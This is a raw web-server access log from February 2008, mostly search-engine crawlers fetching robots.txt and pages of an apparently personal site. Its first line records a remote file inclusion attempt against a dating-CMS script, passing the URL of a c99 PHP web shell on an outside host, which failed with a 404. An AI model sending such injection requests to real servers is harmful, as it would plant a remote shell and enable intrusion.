82.237.212.168 - - [20/Feb/2008:15:49:40 +0100] "GET http://various-euro.com/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://www.usuarios.lycos.es/liurap/shells/c99.txt? HTTP/1.0" 404 2748 "http://various-euro.com/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://www.usuarios.lycos.es/liurap/shells/c99.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
59.40.185.221 - - [20/Feb/2008:16:33:21 +0100] "GET /f-world.html HTTP/1.1" 200 35590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
63.123.238.50 - - [20/Feb/2008:16:55:17 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
63.123.238.50 - - [20/Feb/2008:16:55:17 +0100] "GET / HTTP/1.0" 200 10335 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
63.123.238.52 - - [20/Feb/2008:16:55:19 +0100] "GET /framez_0.html HTTP/1.0" 200 12411 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
219.186.28.4 - - [20/Feb/2008:17:08:43 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Sumimasen Spider 1.2 webmaster@sumimasen.com"
219.186.28.4 - - [20/Feb/2008:17:08:44 +0100] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Sumimasen Spider 1.2 webmaster@sumimasen.com"
81.52.143.16 - - [20/Feb/2008:17:09:40 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
81.52.143.16 - - [20/Feb/2008:17:09:51 +0100] "GET /schubb/schubb-1.html HTTP/1.1" 200 9070 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
74.6.28.48 - - [20/Feb/2008:18:03:08 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.58.185 - - [20/Feb/2008:18:03:09 +0100] "GET / HTTP/1.0" 200 10335 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.34.145.201 - - [20/Feb/2008:18:35:33 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)"
64.34.145.201 - - [20/Feb/2008:18:35:33 +0100] "GET /bmpp/crashhA.html HTTP/1.0" 200 15304 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)"
74.6.22.139 - - [20/Feb/2008:18:44:23 +0100] "GET / HTTP/1.0" 200 10335 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.235 - - [20/Feb/2008:18:55:54 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.20.109 - - [20/Feb/2008:18:55:54 +0100] "GET /rez/601.mp3 HTTP/1.0" 200 5052711 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.23.109 - - [20/Feb/2008:19:08:43 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
